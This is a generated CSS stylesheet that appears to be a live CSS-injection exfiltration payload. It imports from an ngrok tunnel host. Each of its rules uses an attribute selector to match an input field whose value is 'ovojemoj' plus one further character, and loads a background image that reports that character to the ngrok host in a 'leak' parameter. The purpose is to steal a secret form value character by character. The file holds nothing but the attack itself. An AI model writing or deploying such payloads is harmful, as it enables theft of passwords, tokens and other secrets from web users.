@import url("http://bc0a37bcf1d5.ngrok.io/?l=10");
input[value="ovojemoj!"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=!&q=0.4251184943675572");}
input[value="ovojemoj\""] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=\"&q=0.3621790137388978");}
input[value="ovojemoj#"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=#&q=0.5676884201128423");}
input[value="ovojemoj$"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=$&q=0.6206085472582918");}
input[value="ovojemoj%"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=%&q=0.7696768303442272");}
input[value="ovojemoj&"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&&q=0.43487861385740967");}
input[value="ovojemoj'"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak='&q=0.9970623015708291");}
input[value="ovojemoj("] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=(&q=0.5882159408922953");}
input[value="ovojemoj)"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=)&q=0.5421745580998971");}
input[value="ovojemoj*"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=*&q=0.3818089296923104");}
input[value="ovojemoj+"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=+&q=0.13337381929990122");}
input[value="ovojemoj,"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=,&q=0.8510468163039187");}
input[value="ovojemoj-"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=-&q=0.7574672334219938");}
input[value="ovojemoj."] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=.&q=0.046428639013193385");}
input[value="ovojemoj/"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=/&q=0.43674686135270746");}
input[value="ovojemoj0"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=0&q=0.8434627685596083");}
input[value="ovojemoj1"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=1&q=0.11917398495124742");}
input[value="ovojemoj2"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=2&q=0.32032838082951876");}
input[value="ovojemoj3"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=3&q=0.6620498343672052");}
input[value="ovojemoj4"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=4&q=0.10914883624698857");}
input[value="ovojemoj5"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=5&q=0.0380899512923043");}
input[value="ovojemoj6"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=6&q=0.7655592150280048");}
input[value="ovojemoj7"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=7&q=0.020166433710944398");}
input[value="ovojemoj8"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=8&q=0.12891091368659513");}
input[value="ovojemoj9"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=9&q=0.9162608622173327");}
input[value="ovojemoj:"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=:&q=0.17975059648901315");}
input[value="ovojemoj;"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=;&q=0.2167800606008099");}
input[value="ovojemoj<"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=<&q=0.49763549590583955");}
input[value="ovojemoj="] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak==&q=0.00215044934376607");}
input[value="ovojemoj>"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=>&q=0.2771560207228627");}
input[value="ovojemoj?"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=?&q=0.288428428598809");}
input[value="ovojemoj@"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=@&q=0.3699116000093605");}
input[value="ovojemojA"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=A&q=0.6286263676172497");}
input[value="ovojemojB"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=B&q=0.7701987559433554");}
input[value="ovojemojC"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=C&q=0.45992305166618275");}
input[value="ovojemojD"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=D&q=0.9401144101517054");}
input[value="ovojemojE"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=E&q=0.4618258460079394");}
input[value="ovojemojF"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=F&q=0.9536722347613409");}
input[value="ovojemojG"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=G&q=0.8893635875796659");}
input[value="ovojemojH"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=H&q=0.2058488463256376");}
input[value="ovojemojI"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=I&q=0.9610767707698122");}
input[value="ovojemojJ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=J&q=0.6061259658841813");}
input[value="ovojemojK"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=K&q=0.9293768959894677");}
input[value="ovojemojL"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=L&q=0.8502672417882682");}
input[value="ovojemojM"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=M&q=0.6244553723819919");}
input[value="ovojemojN"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=N&q=0.7208123270034503");}
input[value="ovojemojO"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=O&q=0.21223454382353069");}
input[value="ovojemojP"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=P&q=0.46551334557248736");}
input[value="ovojemojQ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Q&q=0.9893540379501811");}
input[value="ovojemojR"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=R&q=0.9487221734506672");}
input[value="ovojemojS"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=S&q=0.10276435368492343");}
input[value="ovojemojT"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=T&q=0.1653343426434737");}
input[value="ovojemojU"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=U&q=0.8486462331970861");}
input[value="ovojemojV"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=V&q=0.21638676352105723");}
input[value="ovojemojW"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=W&q=0.9754615897453252");}
input[value="ovojemojX"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=X&q=0.24113935395314878");}
input[value="ovojemojY"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Y&q=0.34094690628365165");}
input[value="ovojemojZ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Z&q=0.9013269916139783");}
input[value="ovojemoj["] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=[&q=0.10588606508354403");}
input[value="ovojemoj\\"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=\\&q=0.06574218514680386");}
input[value="ovojemoj]"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=]&q=0.6912701447274774");}
input[value="ovojemoj^"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=^&q=0.6102572699194022");}
input[value="ovojemoj_"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=_&q=0.154403721778126");}
input[value="ovojemoj`"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=`&q=0.2640649956898842");}
input[value="ovojemoja"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=a&q=0.4210460417453714");}
input[value="ovojemojb"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=b&q=0.8933213671216662");}
input[value="ovojemojc"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=c&q=0.16071876140990948");}
input[value="ovojemojd"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=d&q=0.5508584764415179");}
input[value="ovojemoje"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=e&q=0.5823199464481135");}
input[value="ovojemojf"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=f&q=0.33490147164059847");}
input[value="ovojemojg"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=g&q=0.34986222776450604");}
input[value="ovojemojh"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=h&q=0.9967784879983776");}
input[value="ovojemoji"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=i&q=0.9085493993647187");}
input[value="ovojemojj"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=j&q=0.08807877516939233");}
input[value="ovojemojk"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=k&q=0.17464768656958252");}
input[value="ovojemojl"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=l&q=0.3505836995200027");}
input[value="ovojemojm"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=m&q=0.21355929163510723");}
input[value="ovojemojn"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=n&q=0.11319461647217555");}
input[value="ovojemojo"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=o&q=0.786597475807028");}
input[value="ovojemojp"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=p&q=0.49114448880757");}
input[value="ovojemojq"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=q&q=0.4986022971595494");}
input[value="ovojemojr"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=r&q=0.45632333363723765");}
input[value="ovojemojs"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=s&q=0.8501602679740441");}
input[value="ovojemojt"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=t&q=0.5095817109481375");}
input[value="ovojemoju"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=u&q=0.006130653655214369");}
input[value="ovojemojv"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=v&q=0.034844335298213513");}
input[value="ovojemojw"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=w&q=0.6967229125437595");}
input[value="ovojemojx"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=x&q=0.6878564460204752");}
input[value="ovojemojy"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=y&q=0.051520473683639434");}
input[value="ovojemojz"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=z&q=0.15436556455120498");}
input[value="ovojemoj{"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak={&q=0.41052564385255064");}
input[value="ovojemoj|"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=|&q=0.26161325030776394");}
input[value="ovojemoj}"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=}&q=0.02495227285085666");}
input[value="ovojemoj~"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=~&q=0.49172273541840594");}
input[value="ovojemoj"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.8915131585234111");}
input[value="ovojemoj"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.4665678692776736");}
input[value="ovojemoj"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.8473177875871778");}
input[value="ovojemoj"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.19625657333273216");}
input[value="ovojemoj"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.38153458855464617");}
input[value="ovojemoj"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.33347655681501087");}
input[value="ovojemoj"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.18129922675781085");}
input[value="ovojemoj"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.5763533987465184");}
input[value="ovojemoj"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.8516611400030729");}
input[value="ovojemoj"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.413850976894353");}
input[value="ovojemoj"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.8310164554909387");}
input[value="ovojemoj"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.0602675860691857");}
input[value="ovojemoj"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.8486134576416495");}
input[value="ovojemoj"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.8349697073145277");}
input[value="ovojemoj"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.5564423893416852");}
input[value="ovojemoj"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.020875612424486212");}
input[value="ovojemoj"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.1314421479277732");}
input[value="ovojemoj"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.04692376293464995");}
input[value="ovojemoj"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.6381353402907872");}
input[value="ovojemoj"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.5963377522111271");}
input[value="ovojemoj"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.10874806961955619");}
input[value="ovojemoj"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.21573493019551715");}
input[value="ovojemoj"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.21361832196195651");}
input[value="ovojemoj"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.11977629546897517");}
input[value="ovojemoj"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.3400271330060607");}
input[value="ovojemoj"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.9192217233343094");}
input[value="ovojemoj"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.5172083165369457");}
input[value="ovojemoj"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.33094182447147835");}
input[value="ovojemoj"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.801758419285387");}
input[value="ovojemoj"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.6310692682623043");}
input[value="ovojemoj"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.2079779616739872");}
input[value="ovojemoj"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.7607059872745459");}
input[value="ovojemoj"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.03240281155089453");}
input[value="ovojemoj "] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak= &q=0.7285312969256585");}
input[value="ovojemoj¡"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¡&q=0.2705281184403896");}
input[value="ovojemoj¢"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¢&q=0.9338194277204395");}
input[value="ovojemoj£"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=£&q=0.1969712488474593");}
input[value="ovojemoj¤"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¤&q=0.29801238807355346");}
input[value="ovojemoj¥"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¥&q=0.37251916583260747");}
input[value="ovojemoj¦"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¦&q=0.9378010488446926");}
input[value="ovojemoj§"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=§&q=0.07951098683406");}
input[value="ovojemoj¨"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¨&q=0.48696760558578545");}
input[value="ovojemoj©"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=©&q=0.3122348903916363");}
input[value="ovojemojª"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ª&q=0.20504344801293461");}
input[value="ovojemoj«"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=«&q=0.16982195820875234");}
input[value="ovojemoj¬"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¬&q=0.5327289786044891");}
input[value="ovojemoj­"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=­&q=0.9391337106421636");}
input[value="ovojemoj®"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=®&q=0.1109768962322597");}
input[value="ovojemoj¯"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¯&q=0.6332408759477912");}
input[value="ovojemoj°"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=°&q=0.9927360172285711");}
input[value="ovojemoj±"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=±&q=0.39179002929123175");}
input[value="ovojemoj²"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=²&q=0.550380562026811");}
input[value="ovojemoj³"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=³&q=0.534363194434307");}
input[value="ovojemoj´"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=´&q=0.5258161476102134");}
input[value="ovojemojµ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=µ&q=0.9509072259889164");}
input[value="ovojemoj¶"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¶&q=0.07324103999862053");}
input[value="ovojemoj·"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=·&q=0.39200455974332415");}
input[value="ovojemoj¸"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¸&q=0.9276924893717557");}
input[value="ovojemoj¹"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¹&q=0.8091482834925816");}
input[value="ovojemojº"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=º&q=0.16432861783213437");}
input[value="ovojemoj»"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=»&q=0.42975865180101747");}
input[value="ovojemoj¼"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¼&q=0.010805278566187404");}
input[value="ovojemoj½"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=½&q=0.07676368974832681");}
input[value="ovojemoj¾"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¾&q=0.6504626701750174");}
input[value="ovojemoj¿"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¿&q=0.30739727820040486");}
input[value="ovojemojÀ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=À&q=0.9775569829977941");}
input[value="ovojemojÁ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Á&q=0.5831607763802096");}
input[value="ovojemojÂ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Â&q=0.6849319837095136");}
input[value="ovojemojÃ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ã&q=0.9210853955686624");}
input[value="ovojemojÄ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ä&q=0.5304723040997881");}
input[value="ovojemojÅ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Å&q=0.3167974006542891");}
input[value="ovojemojÆ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Æ&q=0.37306660649279233");}
input[value="ovojemojÇ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ç&q=0.5504545575787978");}
input[value="ovojemojÈ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=È&q=0.9061522816549556");}
input[value="ovojemojÉ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=É&q=0.7911848355393079");}
input[value="ovojemojÊ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ê&q=0.31545033221575625");}
input[value="ovojemojË"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ë&q=0.6901460815606231");}
input[value="ovojemojÌ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ì&q=0.3143395108707969");}
input[value="ovojemojÍ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Í&q=0.35107677308577245");}
input[value="ovojemojÎ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Î&q=0.7383304159180162");}
input[value="ovojemojÏ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ï&q=0.8811346884744258");}
input[value="ovojemojÐ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ð&q=0.22568220296105168");}
input[value="ovojemojÑ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ñ&q=0.8626630696965498");}
input[value="ovojemojÒ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ò&q=0.7733236720084833");}
input[value="ovojemojÓ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ó&q=0.9798120198383378");}
input[value="ovojemojÔ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ô&q=0.33517266744860463");}
input[value="ovojemojÕ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Õ&q=0.12851854522452166");}
input[value="ovojemojÖ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ö&q=0.43271626547286024");}
input[value="ovojemoj×"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=×&q=0.9106179974068291");}
input[value="ovojemojØ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ø&q=0.9171025093438283");}
input[value="ovojemojÙ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ù&q=0.482054530011955");}
input[value="ovojemojÚ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ú&q=0.3032795511097641");}
input[value="ovojemojÛ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Û&q=0.6002149695413623");}
input[value="ovojemojÜ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ü&q=0.9063666654412701");}
input[value="ovojemojÝ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ý&q=0.5958261280235468");}
input[value="ovojemojÞ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Þ&q=0.7918228645131655");}
input[value="ovojemojß"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ß&q=0.2429077416992178");}
input[value="ovojemojà"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=à&q=0.5264971136257994");}
input[value="ovojemojá"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=á&q=0.5266228605314232");}
input[value="ovojemojâ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=â&q=0.7692634191068548");}
input[value="ovojemojã"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ã&q=0.11845837503503098");}
input[value="ovojemojä"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ä&q=0.7075875877710465");}
input[value="ovojemojå"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=å&q=0.3847282318495755");}
input[value="ovojemojæ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=æ&q=0.05289869315488516");}
input[value="ovojemojç"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ç&q=0.48224548542225065");}
input[value="ovojemojè"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=è&q=0.5037095474584865");}
input[value="ovojemojé"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=é&q=0.44310135401986184");}
input[value="ovojemojê"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ê&q=0.4716964351384936");}
input[value="ovojemojë"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ë&q=0.46666317576444616");}
input[value="ovojemojì"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ì&q=0.5047262346495203");}
input[value="ovojemojí"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=í&q=0.04041290326048719");}
input[value="ovojemojî"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=î&q=0.8841578520589666");}
input[value="ovojemojï"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ï&q=0.7054567796805207");}
input[value="ovojemojð"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ð&q=0.8321206484288395");}
input[value="ovojemojñ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ñ&q=0.9320681946446869");}
input[value="ovojemojò"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ò&q=0.6821140865768704");}
input[value="ovojemojó"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ó&q=0.3859958312541343");}
input[value="ovojemojô"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ô&q=0.29078383276231556");}
input[value="ovojemojõ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=õ&q=0.907758237084167");}
input[value="ovojemojö"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ö&q=0.513810430033401");}
input[value="ovojemoj÷"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=÷&q=0.9047708148986189");}
input[value="ovojemojø"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ø&q=0.9953811891534634");}
input[value="ovojemojù"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ù&q=0.5315957728634875");}
input[value="ovojemojú"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ú&q=0.5384465451014158");}
input[value="ovojemojû"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=û&q=0.27899787317971403");}
input[value="ovojemojü"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ü&q=0.6690271577934472");}
input[value="ovojemojý"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ý&q=0.9449147059860212");}
input[value="ovojemojþ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=þ&q=0.6382027417886929");}
input[value="ovojemojÿ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ÿ&q=0.1900390990381533");}
